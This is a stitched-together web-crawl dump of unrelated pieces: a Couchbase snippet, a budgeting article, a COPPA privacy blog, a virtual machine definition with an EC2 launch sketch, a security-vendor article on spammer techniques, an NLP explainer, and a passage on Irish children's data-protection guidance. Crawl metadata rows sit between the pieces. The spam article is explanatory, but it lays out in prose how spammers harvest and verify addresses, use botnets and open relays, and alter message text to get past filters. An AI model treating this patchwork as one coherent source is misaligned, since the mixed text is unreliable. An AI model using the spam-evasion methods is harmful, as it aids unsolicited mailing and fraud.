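collection = cluster.bucket("example-bucket").default_collection()

# Key/value write and read: documents are stored as JSON under a key.
collection.upsert("user::1001", {"name": "Ada", "plan": "pro"})
doc = collection.get("user::1001").content_as[dict]
print(doc)

# Index-backed query over documents (requires a primary or matching index).
for row in cluster.query("SELECT b.* FROM `example-bucket` b WHERE b.plan = 'pro'").rows():
    print(row)
```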
- With Couchbase, one can start with small server configurations and add more servers as needed
- Businesses do not have to worry about purchasing higher-end servers upfront, which would lead to wasted money if they eventually did not need them
- Couchbase servers can be added, removed, and scaled up or down at any time
- Built for scaling with horizontal scalability of servers and nearly linear performance
- Updating data is simple, either by direct assignment or via an index
- Data inserts are fast
- Couchbase indexes are very flexible, allowing for multiple indexes with various options on each index
- The performance of Couchbase scales nearly linearly, so doubling the number of servers roughly doubles throughput
- Disaster recovery is built into Couchbase
- Data can be replicated across multiple Couchbase clusters for load balancing and failover.
- Couchbase is ideal for businesses needing a database that can scale with their company.
- Document database for fast access to data via key/value pairs or full documents
- Simple, flexible indexes with multiple options on each index
- Data can be replicated across multiple clusters for load balancing and failover | <urn:uuid:9e4e42d4-a78e-48ce-9787-413801835bb9> | CC-MAIN-2022-40 | https://data443.com/data_security/couchbase/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337971.74/warc/CC-MAIN-20221007045521-20221007075521-00141.warc.gz | en | 0.890484 | 304 | 2.609375 | 3 |
A budget is a systematic method of allocating financial, physical and human resources to achieve strategic goals. Companies develop budgets in order to monitor progress toward their goals, help control spending, and predict cash flow and profit.
The most effective budgets are those that:
- Communicate and support strategic goals.
- Identify risks in relation to the company's long-term strategy.
- Provide information to help management make better decisions.
- Facilitate goal setting and measurement.
- Deliver consistent realistic figures companywide.
- Accommodate changing business conditions.
The goal of companies that apply best practices is to develop budgets that give managers a well-designed tool to manage effectively. To do this, companies use technology effectively; just as important, they develop procedures that work in their industry and with the culture of their company.
The central challenge to budget developers is that by trying to map the future for a company, they are attempting something that can never be done with perfect precision. With a greater number of companies competing in multiple, global markets, and with economic and technological change accelerating, companies need to develop budgets that strive for precision but also can accommodate business conditions that will certainly change.
Important benefits of improving the budgeting process include:
- Better companywide understanding of strategic goals
- Better support of initiatives supporting those goals
- The ability to respond more quickly and forcefully to competition
- Cost savings, through better practices in every unit that does budgeting
Applying performance measures to the budgeting process is also key to process improvement. Performance measures are the "vital signs" of an organization. Quantitative measures of performance provide management with insight into company performance and highlight opportunities for improvement. Such measures provide a company with the information needed to benchmark with another company, compare performance with industry standards and averages, and track any progress in performance improvement over time. By using performance measures, managers and workers understand the outcome of their efforts and how those efforts affect the rest of the organization.
To be meaningful, performance measures must be quantified: an act of measurement is required, one that can be performed reliably and consistently with a basis in fact, not opinion. "Good" and "fast" are not adequate performance measures. "Number of defects" and "time for order processing" are acceptable measures, if they are controllable — that is, if the people performing the work can affect the outcome. In addition to being quantifiable and controllable, to be truly effective, performance measures must also be:
- Aligned with company objectives
- Supportive of continuous improvement
- Reported consistently and promptly
Performance measures can be cost-based, quality-based or time-based. Cost-based measures cover the financial side of performance. Quality-based measures assess how well an organization's products or services meet customer needs. Time-based measures focus on how quickly the organization can respond to outside influences, from customer orders to changes in competition. Focusing attention simultaneously on cost, quality and time can optimize performance for an entire process and ultimately an entire organization.
A few cost-focused performance measures for the budgeting process include the following (a small worked example appears after the list):
- The total cost of financial budgeting and planning as a percentage of revenue.
- A higher-than-average ratio may be due to higher compensation to staff involved when preparing and analyzing the budget or to excess staffing in the budget process. Other reasons for a higher ratio include a process that is highly decentralized or one that uses technology that needs updating. Some companies, however, will have a higher ratio because their revenue is below the benchmark group average. A lower-than-average ratio may be due to lower compensation rates for budget preparation staff or a staff that is less highly skilled. However, a company that uses technology efficiently will also have a lower-than-average ratio, as well as a company with revenue above the benchmark group average.
- The number of full-time equivalent (FTE) staff, as a percentage of total staff, devoted to budgeting.
- FTE is defined as equal to 40 hours.
- The number of budgets produced annually.
- A higher number of budgets indicates that more time and resources are being spent on budgeting.
- Some reasons that a company might have a higher-than-average number of budgets:
- Preparing different types of budgets for the same financial entity
- Creating budgets that include too much detail
- Requiring many revisions of budgets
- By contrast, a company might have a lower-than-average number of budgets due to the following factors: synchronizing budgets for each entity, simplifying required details, and providing clear guidelines on strategies and assumptions so that less revision is required.
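These measures are simple ratios once the inputs are gathered. A minimal sketch of the arithmetic, with all figures invented for illustration:

```python
def budgeting_measures(budgeting_cost, revenue, budgeting_ftes, total_staff, budgets_per_year):
    """Compute the three cost-focused measures described above."""
    return {
        "budgeting cost as % of revenue": 100 * budgeting_cost / revenue,
        "budgeting FTEs as % of total staff": 100 * budgeting_ftes / total_staff,
        "budgets produced annually": budgets_per_year,
    }

print(budgeting_measures(budgeting_cost=450_000, revenue=120_000_000,
                         budgeting_ftes=6, total_staff=800, budgets_per_year=14))
# {'budgeting cost as % of revenue': 0.375, 'budgeting FTEs as % of total staff': 0.75,
#  'budgets produced annually': 14}
```

Tracked over time and against a benchmark group, these ratios show whether the budgeting process is getting leaner or more expensive.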
Between geolocation smartphone apps, social media updates and web traffic analysis, the online world probably knows a lot about you. While there aren’t too many strict regulations regarding online privacy for adults, the United States does have some requirements for websites aimed at children. Several companies, including McDonalds and General Mills, have recently been accused of violating the U.S. Children’s Online Privacy Protection Act (COPPA), according to a recent Marketplace Tech article. “Basically the idea is that a kid goes onto the website, is playing a fun game, then is prompted hey, why don’t you email any of your friends that might want to get here, and so the idea is to drive traffic to the website,” said Ryan Calo, an assistant professor at the University of Washington School of Law, who was quoted in the article.
The problem is that some of those website practices fall into a legal grey area, according to the article. Although COPPA restricts the ways in which websites can collect and use personal information of individuals under the age of 13, it doesn’t have clear guidelines for sites that encourage children to email other kids.
The article also highlighted a larger problem: Most adults, as well as children, don’t fully understand how companies are collecting and using their data. This means few internet users leverage solutions such as application control to prevent apps from collecting their private data.
As technology advances, the amount of information organizations can collect on consumers grows, along with privacy concerns. As a recent Forbes article pointed out, consumer devices are collecting information even while their owners sleep – smartphones report on user locations, the electric company records power usage, etc. The big question is whether these data collection efforts are justified or if companies are taking things too far.
Do companies collect too much information about their customers? Should governments be able to design stricter online privacy laws for adults? | <urn:uuid:97558841-5209-45a9-8573-d29bc866ade9> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/companies-accused-of-violating-coppa | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00341.warc.gz | en | 0.953306 | 391 | 2.609375 | 3 |
A virtual machine is an abstraction of a physical computer. Virtual machines run on physical computers and can be thought of as a “computer in a computer.” This allows public cloud providers massive economies of scale, because they can launch virtual servers for many customers without having to purchase a physical computer for each virtual machine. Virtual machines enable cloud computing services like AWS EC2 to exist. Most resources on the cloud are virtualized, such as computing resources, networks, and serverless functions.
In other words
A slice of the cloud that acts like a computer just for you and your business.
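For example, launching a virtual machine on AWS EC2 is a single API call once credentials are configured. A hedged sketch with the boto3 SDK; the region, AMI ID, instance type and key pair name are placeholders you would replace with your own:

```python
import boto3

ec2 = boto3.client("ec2", region_name="us-east-1")

# Request one small virtual machine from a machine image (AMI). The AMI ID
# below is a placeholder; real IDs are region-specific.
response = ec2.run_instances(
    ImageId="ami-0123456789abcdef0",
    InstanceType="t3.micro",
    MinCount=1,
    MaxCount=1,
    KeyName="my-key-pair",
)

instance_id = response["Instances"][0]["InstanceId"]
print(f"Launched virtual machine {instance_id}")
```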
Spammers use dedicated programs and technologies to generate and transmit the billions of spam emails which are sent every day (from 60% to 90% of all mail traffic). This requires significant investment of both time and money.
Spammer activity can be broken down into the following steps:
- Collecting and verifying recipient addresses; sorting the addresses into target groups
- Creating platforms for mass mailing (servers and/or individual computers)
- Writing mass mailing programs
- Marketing spammer services
- Developing texts for specific campaigns
- Sending spam
Each step in the process is carried out independently of the others.
Collecting and verifying addresses; creating address lists
The first step in running a spammer business is creating an email database. Entries do not only consist of email addresses; each entry may contain additional information such as geographical location, sphere of activity (for corporate entries) or interests (for personal entries). A database may contain addresses from specific mail providers, such as Yandex, Hotmail, AOL etc. or from online services such as PayPal or eBay.
There are a number of methods spammers typically use to collecting addresses:
- Guessing addresses using common combinations of words and numbers – john@, destroyer@, alex-2@
- Guessing addresses by analogy – if there is a verified email@example.com, then it is reasonable to search for the same user name at other domains and services – firstname.lastname@example.org, @aol.com, PayPal, etc.
- Scanning public resources including web sites, forums, chat rooms, Whois databases, Usenet News and so forth for word combinations (i.e. word1@word2.word3, with word3 being a top-level domain such as .com or .info)
- Stealing databases from web services, ISPs etc.
- Stealing users’ personal data using computer viruses and other malicious programs
Topical databases are usually created using the third method, since public resources often contain information about user preferences along with personal information such as gender, age etc. Stolen databases from web services and ISPs may also include such information, enabling spammers to further personalize and target their mailings.
Stealing personal data such as mail client address books is a recent innovation, but is proving to be highly effective, as the majority of addresses will be active. Unfortunately, recent virus epidemics have demonstrated that there are still a great many systems without adequate antivirus protection; this method will continue to be successfully used until the vast majority of systems have been adequately secured.
Once email databases have been created, the addresses need to be verified before they can be sold or used for mass mailing.
- Initial test mailing. A test message with a random text which is designed to evade spam filters is sent to the entire address list. The mail server logs are analysed for active and defunct addresses and the database is cleaned accordingly.
- Once addresses have been verified, a second message is often sent to check whether recipients are reading messages. For instance, the message may contain a link to a picture on a designated web server. Once the message is opened, the picture is downloaded automatically and the website will log the address as active.
- A more successful method of verifying if an address is active is a social engineering technique. Most end users know that they have the right to unsubscribe from unsolicited and/or unwanted mailings. Spammers take advantage of this by sending messages with an ‘unsubscribe’ button. Users click on the unsubscribe link and a message purportedly unsubscribing the user is sent. Instead, the spammer receives confirmation that the address in question is not only valid but that the user is active.
However, none of these methods are foolproof and any spammer database will always contain a large number of inactive addresses.
Creating platforms for mass mailing
Today’s spammers use one of these three mass mailing methods:
- Direct mailing from rented servers
- Using open relays and open proxies – servers which have been poorly configured and are therefore freely accessible
- Bot networks – networks of zombie machines infected with malware, usually a Trojan, which allow spammers to use the infected machines as platforms for mass mailings without the knowledge or consent of the owner.
Renting servers is problematic, since anti-spam organizations monitor mass mailings and are quick to add servers to blacklists. Most ISPs and anti-spam solutions use blacklists as one method to identify spam: this means that once a server has been blacklisted, it can no longer be used by spammers.
Using open relay and open proxy servers is also time consuming and costly. First spammers need to write and maintain robots that search the Internet for vulnerable servers. Then the servers need to be penetrated. However, very often, after a few successful mailings, these servers will also be detected and blacklisted.
As a result, today most spammers prefer to create or purchase bot networks. Professional virus writers use a variety of methods to create and maintain these networks:
- Pirated software is a favorite vehicle for spreading malicious code. Since these programs are often spread via file-sharing networks such as Kazaa, eDonkey and others, the networks themselves are penetrated, and even users who do not use pirated software are at risk.
- Exploiting vulnerabilities in Internet browsers, primarily MS Internet Explorer. There are a number of vulnerabilities in browsers which make it possible to penetrate a computer from a site being viewed by the machine’s user. Virus writers exploit such holes and write Trojans and other malware to penetrate victim machines, giving malware owners full access to, and control over, these infected machines. For instance, pornographic sites and other frequently visited semi-legal sites are often infested with such malicious programs. In 2004 a large number of sites running under MS IIS were penetrated and infected with Trojans. These Trojans then attacked the machines of users who believed that these sites were safe.
- Using email worms and exploiting vulnerabilities in MS Windows services to distribute and install Trojans: MS Windows systems are inherently vulnerable, and hackers and virus writers are always ready to exploit this. Independent tests have demonstrated that a Windows XP system without either a firewall or antivirus software will be attacked within approximately 20 minutes of being connected to the Internet.
Modern malware is rather technologically sophisticated – the authors of these programs spare neither time nor effort to make detection of their creations as difficult as possible. Trojan components can behave as Internet browsers asking websites for instructions – whether to launch a DoS attack or to start spam mailing, etc. (the instructions may even contain information about the time and the ‘place’ of the next instruction). IRC is also used to get instructions.
An average mass mailing contains about a million messages. The objective is to send the maximum number of messages in the minimum possible time. There is a limited window of opportunity before anti-spam vendors update signature databases to deflect the latest types of spam.
Sending a large number of messages within a limited timeframe requires appropriate technology. There are a number of resources available that are developed and used by professional spammers. These programs need to be able to:
- Send mail over a variety of channels including open relays and individual infected machines.
- Create dynamic texts.
- Spoof legitimate message headers.
- Track the validity of an email address database.
- Detect whether individual messages are delivered or not and to resend them from alternative platforms if the original platform has been blacklisted.
These spammer applications are available as subscription services or as a stand-alone application for a one-off fee.
Marketing spammer services
Strangely enough, spammers advertise their services using spam. In fact, the advertising which spammers use to promote their services constitutes a separate category of spam. Spammer-related spam also includes advertisements for spammer applications, bot networks and email address databases.
Creating the message body
Today, anti-spam filters are sophisticated enough to instantly detect and block a large number of identical messages. Spammers therefore now make sure that mass mailings contain emails with almost identical content, with the texts being very slightly altered. They have developed a range of methods to mask the similarity between messages in each mailing:
- Inclusion of random text strings, words or invisible text. This may be as simple as including a random string of words and/or characters or a real text from a real source at either the beginning or the end of the message body. An HTML message may contain invisible text – tiny fonts or text which is colored to match the background. All of these tricks interfere with the fuzzy matching and Bayesian filtering methods used by anti-spam solutions. However, anti-spam developers have responded by developing quotation scanners, detailed analysis of HTML encoding and other techniques. In many cases spam filters simply detect that such tricks have been used in a message and automatically flag it as spam.
- Graphical spam. Sending text in graphics format hindered automatic text analysis for a period of time, though today a good anti-spam solution is able to detect and analyze incoming graphics
- Dynamic graphics. Spammers are now utilizing complicated graphics with extra information to evade anti-spam filters.
- “Fragmented” Images. Actually the image consists of several smaller images, but a user sees it as complete text. Animation is just another type of fragmentation whereby the image is split into frames that are layered over each other, with the end result being complete text.
- Paraphrasing texts. A single advertisement can be endlessly rephrased, making each individual message appear to be a legitimate email. As a result, anti-spam filters have to be configured using a large number of samples before such messages can be detected as spam.
A good spammer application will utilize all of the above methods, since different potential victims use different anti-spam filters. Using a variety of techniques ensures that a commercially viable number of messages will escape filtration and reach the intended recipients.
Spam and psychology
Sending messages quickly and getting them past all filters to the recipient is an important part of the spamming process, but there’s more to it than that. Spammers also need to ensure that a user will read the message and do what the spammer wants (i.e., call a designated number, click on a link, etc.).
In 2006, spammers continued to master the psychological methods used to manipulate spam recipients. In particular, in order to hook a user into reading an email, spammers tried to persuade recipients that messages were actually personal correspondence, not spam. At the beginning of the year, spammers mainly used primitive approaches, such as adding RE or FW at the beginning of a subject line to indicate that a message was a reply to a previous email or that it had been sent from a known address. By the middle of the year, spammers had begun to use more subtle tactics.
Spammers began working on their message texts. Today, some spam message texts are stylistically and lexically designed to look like personal correspondence. There are some convincing examples that might even fool an expert at first glance, not to mention less experienced users. This kind of spam is often highly impersonal (it doesn’t address anyone in particular or uses words like ‘girlfriend’ or ‘sweety’, etc.) in order to create the illusion that the email was intended only for the recipient. Sometimes names are used in faked personal correspondence. Whatever the case, the user’s curiosity will be piqued and s/he may well read it to find out who it came from, or if s/he should forward it, etc.
Another spammer trick utilizing social engineering technique is the use of hot news themes (sometimes thought up by the spammers themselves) in spam messages.
The structure of a spammer business
The steps listed above require a team of different specialists or outsourcing certain tasks. The spammers themselves, i.e. the people who run the business and collect money from clients, usually purchase or rent the applications and services they need to conduct mass mailings.
Spammers are divided into professional programmers and virus writers who develop and implement the software needed to send spam, and amateurs who may not be programmers or IT people, but simply want to make some easy money.
The spam market today is valued at approximately several hundred million dollars annually. How is this figure reached? Divide the number of messages detected every day by the number of messages in a standard mailing, then multiply the result by the average cost of a standard mailing: 30 billion (messages) divided by 1 million (messages), multiplied by US $100, multiplied by 365 (days), gives an estimated annual turnover of $1,095 million.
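For readers who want to check the arithmetic, the same back-of-the-envelope estimate can be reproduced in a few lines of Python (the figures are the illustrative ones quoted above, not measured values):

```python
# Back-of-the-envelope estimate of annual spam turnover,
# using the illustrative figures quoted in the text.
messages_per_day = 30_000_000_000   # spam messages detected daily
mailing_size = 1_000_000            # messages in one standard mass mailing
price_per_mailing = 100             # average price of one mailing, in USD

mailings_per_day = messages_per_day / mailing_size        # 30,000 mailings per day
annual_turnover = mailings_per_day * price_per_mailing * 365

print(f"Estimated annual turnover: ${annual_turnover:,.0f}")  # $1,095,000,000
```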
Such a lucrative market encourages full-scale companies which run the entire business cycle in-house in a professional and cost-effective manner. There are also legal issues: collecting personal data and sending unsolicited correspondence is currently illegal in most countries of the world. However, the money is good enough to attract the interest of people who are willing to take risks and potentially make a fat profit.
The spam industry is therefore likely to follow in the footsteps of other illegal activities: go underground and engage in a prolonged cyclic battle with law enforcement agencies. | <urn:uuid:251ce389-668c-468b-bbd9-4b5927a2cc85> | CC-MAIN-2022-40 | https://encyclopedia.kaspersky.com/knowledge/contemporary-spammer-technologies/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00341.warc.gz | en | 0.930799 | 2,762 | 2.78125 | 3 |
NLP vs. NLU vs. NLG: the differences between three natural language processing concepts
While natural language processing (NLP), natural language understanding (NLU), and natural language generation (NLG) are all related topics, they are distinct ones. At a high level, NLU and NLG are just components of NLP. Given how they intersect, they are commonly confused within conversation, but in this post, we’ll define each term individually and summarize their differences to clarify any ambiguities.
What is natural language processing?
Natural language processing, which evolved from computational linguistics, uses methods from various disciplines, such as computer science, artificial intelligence, linguistics, and data science, to enable computers to understand human language in both written and verbal forms. While computational linguistics has more of a focus on aspects of language, natural language processing emphasizes its use of machine learning and deep learning techniques to complete tasks, like language translation or question answering. Natural language processing works by taking unstructured data and converting it into a structured data format. It does this through the identification of named entities (a process called named entity recognition) and identification of word patterns, using methods like tokenization, stemming, and lemmatization, which examine the root forms of words. For example, the suffix -ed on a word, like called, indicates past tense, but it has the same base infinitive (to call) as the present tense verb calling.
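To make those preprocessing steps concrete, here is a minimal sketch using the open-source NLTK library (one toolkit among many; the download calls fetch the tokenizer and WordNet data the first time they run):

```python
import nltk
from nltk.stem import PorterStemmer, WordNetLemmatizer

# One-time downloads of the tokenizer model and WordNet data.
nltk.download("punkt", quiet=True)
nltk.download("wordnet", quiet=True)

sentence = "She called the office while calling clients."
tokens = nltk.word_tokenize(sentence)          # split text into word tokens

stemmer = PorterStemmer()
lemmatizer = WordNetLemmatizer()

for token in tokens:
    stem = stemmer.stem(token)                     # crude suffix stripping
    lemma = lemmatizer.lemmatize(token, pos="v")   # dictionary-based root form
    print(f"{token:10} stem={stem:10} lemma={lemma}")

# Both "called" and "calling" reduce to the shared base form "call".
```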
While a number of NLP algorithms exist, different approaches tend to be used for different types of language tasks. For example, hidden Markov chains tend to be used for part-of-speech tagging. Recurrent neural networks help to generate the appropriate sequence of text. N-grams, a simple language model (LM), assign probabilities to sentences or phrases to predict the accuracy of a response. These techniques work together to support popular technology such as chatbots, or speech recognition products like Amazon’s Alexa or Apple’s Siri. However, its application has been broader than that, affecting other industries such as education and healthcare.
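As a toy illustration of the n-gram idea, the self-contained sketch below builds a bigram model from a three-line corpus and scores candidate sentences; real language models are trained on vastly more data, but the principle is the same:

```python
from collections import Counter

corpus = [
    "alexa play some music",
    "alexa play the news",
    "alexa read the news",
]

# Count unigrams and bigrams over the toy corpus.
unigrams, bigrams = Counter(), Counter()
for line in corpus:
    words = line.split()
    unigrams.update(words)
    bigrams.update(zip(words, words[1:]))

def bigram_probability(sentence: str) -> float:
    """Approximate P(sentence) as the product of P(w_i | w_i-1)."""
    words = sentence.split()
    prob = 1.0
    for prev, word in zip(words, words[1:]):
        # Add-one smoothing so unseen pairs get a small non-zero probability.
        prob *= (bigrams[(prev, word)] + 1) / (unigrams[prev] + len(unigrams))
    return prob

print(bigram_probability("alexa play the news"))   # relatively likely
print(bigram_probability("alexa news the play"))   # much less likely
```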
What is natural language understanding?
Natural language understanding is a subset of natural language processing, which uses syntactic and semantic analysis of text and speech to determine the meaning of a sentence. Syntax refers to the grammatical structure of a sentence, while semantics alludes to its intended meaning. NLU also establishes a relevant ontology: a data structure which specifies the relationships between words and phrases. While humans naturally do this in conversation, the combination of these analyses is required for a machine to understand the intended meaning of different texts.
Our ability to distinguish between homonyms and homophones illustrates the nuances of language well. For example, let’s take the following two sentences:
- Alice is swimming against the current.
- The current version of the report is in the folder.
In the first sentence, the word, current is a noun. The verb that precedes it, swimming, provides additional context to the reader, allowing us to conclude that we are referring to the flow of water in the ocean. The second sentence uses the word current, but as an adjective. The noun it describes, version, denotes multiple iterations of a report, enabling us to determine that we are referring to the most up-to-date status of a file.
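A part-of-speech tagger makes this distinction explicit. The sketch below uses the open-source spaCy library and assumes its small English model (en_core_web_sm) has been installed; other NLP toolkits expose similar functionality:

```python
import spacy

# Requires: pip install spacy && python -m spacy download en_core_web_sm
nlp = spacy.load("en_core_web_sm")

sentences = [
    "Alice is swimming against the current.",
    "The current version of the report is in the folder.",
]

for text in sentences:
    doc = nlp(text)
    for token in doc:
        if token.text == "current":
            # Expect NOUN for the first sentence and ADJ for the second.
            print(f"{text!r}: current -> {token.pos_}")
```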
These approaches are also commonly used in data mining to understand consumer attitudes. In particular, sentiment analysis enables brands to monitor their customer feedback more closely, allowing them to cluster positive and negative social media comments and track net promoter scores. By reviewing comments with negative sentiment, companies are able to identify and address potential problem areas within their products or services more quickly.
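As a simple illustration, the sketch below uses NLTK's VADER sentiment analyzer (assuming the vader_lexicon data package has been downloaded) to bucket a few made-up social media comments into positive and negative groups:

```python
import nltk
from nltk.sentiment import SentimentIntensityAnalyzer

nltk.download("vader_lexicon", quiet=True)
analyzer = SentimentIntensityAnalyzer()

comments = [
    "Love the new release, setup took two minutes!",
    "Support never answered my ticket, very disappointed.",
    "The update broke my login page again.",
]

positive, negative = [], []
for comment in comments:
    # compound is a normalized score in [-1, 1]; 0.05 is a common cutoff.
    score = analyzer.polarity_scores(comment)["compound"]
    (positive if score >= 0.05 else negative).append((score, comment))

print("Positive:", positive)
print("Negative:", negative)
```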
What is natural language generation?
Natural language generation is another subset of natural language processing. While natural language understanding focuses on computer reading comprehension, natural language generation enables computers to write. NLG is the process of producing a human language text response based on some data input. This text can also be converted into a speech format through text-to-speech services.
NLG also encompasses text summarization capabilities that generate summaries from input documents while maintaining the integrity of the information. Extractive summarization is the AI innovation powering Key Point Analysis used in That’s Debatable.
Initially, NLG systems used templates to generate text. Based on some data or query, an NLG system would fill in the blank, like a game of Mad Libs. But over time, natural language generation systems have evolved with the application of hidden Markov chains, recurrent neural networks, and transformers, enabling more dynamic text generation in real time.
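The template-driven approach is easy to illustrate; modern neural systems replace the fixed template with a learned model, but the data-in, text-out idea is the same. A minimal sketch:

```python
# Template-based NLG: structured data in, natural-language sentence out.
TEMPLATE = ("{city} will be {condition} today with a high of "
            "{high}°C and a low of {low}°C.")

def generate_report(record: dict) -> str:
    """Fill the fixed template with values from a data record."""
    return TEMPLATE.format(**record)

data = {"city": "Dublin", "condition": "mostly cloudy", "high": 14, "low": 8}
print(generate_report(data))
# Dublin will be mostly cloudy today with a high of 14°C and a low of 8°C.
```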
As with NLU, NLG applications need to consider language rules based on morphology, lexicons, syntax and semantics to make choices on how to phrase responses appropriately. They tackle this in three stages:
- Text planning: During this stage, general content is formulated and ordered in a logical manner.
- Sentence planning: This stage considers punctuation and text flow, breaking out content into paragraphs and sentences and incorporating pronouns or conjunctions where appropriate.
- Realization: This stage accounts for grammatical accuracy, ensuring that rules around punctuation and conjugations are followed. For example, the past tense of the verb run is ran, not runned.
NLP vs NLU vs. NLG summary
- Natural language processing (NLP) seeks to convert unstructured language data into a structured data format to enable machines to understand speech and text and formulate relevant, contextual responses. Its subtopics include natural language understanding and natural language generation.
- Natural language understanding (NLU) focuses on machine reading comprehension through grammar and context, enabling it to determine the intended meaning of a sentence.
- Natural language generation (NLG) focuses on text generation, or the construction of text in English or other languages, by a machine and based on a given dataset.
Infuse your data for AI
Natural language processing and its subsets have numerous practical applications within today’s world, like healthcare diagnoses or online customer service.
Explore some of the latest NLP research at IBM or take a look at some of IBM’s product offerings, like Watson Natural Language Understanding. Its text analytics service offers insight into categories, concepts, entities, keywords, relationships, sentiment, and syntax from your textual data to help you respond to user needs quickly and efficiently. Help your business get on the right track to analyze and infuse your data at scale for AI. | <urn:uuid:00cba12c-a469-4ac7-be4a-fd66fb9abea6> | CC-MAIN-2022-40 | https://www.ibm.com/blogs/watson/2020/11/nlp-vs-nlu-vs-nlg-the-differences-between-three-natural-language-processing-concepts/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00341.warc.gz | en | 0.913562 | 1,333 | 3.09375 | 3 |
One in every five people (20.5%) in Ireland is a child under the age of 14. This constitutes the highest proportion of children in the EU, where the average was 15.2% in 2019. Ireland’s proportion of young people under the age of 30 is also the highest in the EU, at 39%. It’s an influential figure for Irish policy makers and regulators, who have strengthened their approach to the protection of children’s personal data in recent years. This greater emphasis on children’s rights is due to a number of additional intersecting dynamics including EU law, child abuse scandals, a rise in cyberbullying, and a growing consensus that children face heightened digital risks. These dynamics have also informed the planned establishment of an Online Safety Commissioner, currently advancing as part of the recently published Online Safety and Media Regulation Bill, which is receiving strong media attention.
Together with the Irish DPC’s role as lead regulator for many leading technology and social media companies, these legal and cultural dynamics provide the context within which the DPC aims to develop strong child data protection standards.
Following extensive public consultation, with experts as well as school children, the DPC has issued comprehensive guidance on the processing of children’s data. Entitled “Children Front and Centre: Fundamentals for a Child-Oriented Approach to Data Processing,” the guidance sets out 14 principles (referred to as “the Fundamentals”) for organizations engaged in processing the personal data of children.
In addition to the usual GDPR expectations, the specific Fundamentals also include:
- Zero interference with a child’s best interests, where organizations rely on legitimate interests as their legal basis for processing;
- “Know your customer” requirements focusing on child-oriented transparency; and
- Specific guidance around age verification and consent
The overall aim of the Fundamentals, in protecting the best interests of children, is to at least set a default floor of high standardised protection for all data subjects where children may form part of a mixed user audience.
A Pyramid of Protection
A pyramid of protection for children’s rights informs the Fundamentals. The Irish Constitution, the dynamic foundation of Irish law, guarantees to protect and vindicate the ‘natural and imprescriptible rights of all children’. In addition Ireland ratified the UN Convention on the Rights of the Child and the assigned UN Committee published a general comment in 2021 explicitly stating that children’s rights under the Convention apply to the digital environment. The case law of the ECJ and the European Court of Human Rights fleshed out those rights in specific detail prior to the birth of the GDPR. The DPC places the guidelines within that prism of law and so reflects and relies on these broader legal protections for children to frame its Fundamentals.
Consistent with the GDPR, the Fundamentals confirm that children have the same rights as adults over their personal data. Their data does not belong to any other interested party, such as their parents or guardians. Children are given the same rights as adults to transparent processing, access, rectification, erasure, portability, restriction, objection, and freedom from automated decision making.
However, this is easier said than done. Determining the optimal way to balance children’s rights and the commercial mission of companies can be tricky given varying cultural norms and ever-evolving digital dynamics. While veering towards the prescriptive at times, the Fundamentals aim to guide and will be persuasive in legal fora, particularly given the DPC’s role as lead regulatory authority for many of the major online platforms.
The Fundamentals provide details on how the GDPR’s legal bases should be applied to the processing of children’s data, guiding the following observations:
- All legal bases for processing are equal to each other under the GDPR. Consent does not therefore assume a higher ranking.
- Where relying on consent, however, organizations should ensure that children are given real choice over how their personal data is used and are capable of giving informed consent.
- As with employment, the guidance states that data controllers must take account of any imbalance of power inherent in the relationship with the user-child and must consider whether such consent can truly be deemed to be “freely given.” A capacity assessment may be necessary to assess this, which would likely require additional resourcing and expert teams, as an inevitable consequence of the decision to provide services to children using consent as a legal basis. In practice, this will make it more difficult to rely on consent as the legal basis for processing children’s data.
- Reliance on contractual necessity will also prove difficult, given what the guidance refers to as the “complexities, nuances and antiquated nature of elements of this area of Irish contract law.” Under Irish contract law, minors under the age of 18 have limited legal capacity beyond contracts for necessities.
- Using compliance with a legal obligation as the legal basis for child data processing requires identifying the specific legal obligation being relied on and why it is necessary to rely on it for processing a child’s data, without it becoming a barrier to safeguarding and protecting the best interests of the child.
- While the vital interests of the child may form the legal basis for processing, child protection measures should take precedence over data protection considerations. The guidance states, in relation to this basis of processing, that ‘the GDPR and data protection in general, should not be used as an excuse, blocker or obstacle to sharing information where doing so is necessary to protect the vital interests of a child or children.’
- Likewise, for reliance on the performance of an official or public task as a legal basis, the DPC guidance should be complied with, “save where the public interest and/or the best interests of the child require otherwise and the organization can demonstrate why/how this is the case.”
- But using legitimate interests as the legal basis to process children’s information is particularly difficult under the Fundamentals. Under the GDPR, a balancing exercise between the necessity of an organization’s legitimate interests and the rights of data subjects is required if the organization seeks to rely on that as the legal basis for such processing. However, using the legitimate interest basis for processing children’s data, while not impossible, is actively discouraged in Fundamental 3, with a zero tolerance approach to encroachment on a child’s best interests. While this approach was not popular with the technology sector during the public consultation, the DPC guides that “the child’s interests or fundamental rights should always take precedence over the rights and interests of an organization which is processing children’s personal data for commercial purposes.” Also, the DPC guides that “in circumstances where there is any level of interference with the best interests of the child, this legal basis will not be available for the processing of children’s personal data.”
Further Processing Concerns
Beyond the legal bases above, the Fundamentals provide further guidance on a wider array of child data processing issues, guiding the following observations:
- Age is addressed in two respects – the age of digital consent and age verification. The digital age of consent in Ireland is currently 16, though it is subject to review this year. Where an offering to any child under that age is based on consent, it must be via parental/guardian consent. Fundamental 2’s “Clear-cut Consent” states that it is “of critical importance” that this requirement does not operate to prevent a child accessing a service. Nor should such consent from children or their parents be used as a way to treat children of all ages as if they were adults.
- Organizations are expected to make “reasonable efforts” to verify parental consent where given on behalf of a child under the age of 16. While leaving it up to the companies to decide how best to achieve this, the DPC guides a higher burden of verification for technology and internet companies given the “scale, specialities and resources” available to them and the higher risks to their child users. All methods of parental verification are expected to be proportionate, risk-based and “not overly intrusive”. The DPC refers to methods endorsed by the equivalent regulators in other jurisdictions which could act as a blueprint, noting in particular 7 specific U.S. FTC methods (see pages 42-43).
- “Your Platform, Your Responsibility” is Fundamental 9. Under it, the DPC expects those selling goods and services through digital and online technologies to go the “extra mile” in their age verification measures. The DPC “considers that a higher burden applies to such organizations in their efforts to both verify age . . . and verify that consent has been given by the parent/guardian of the child user.”
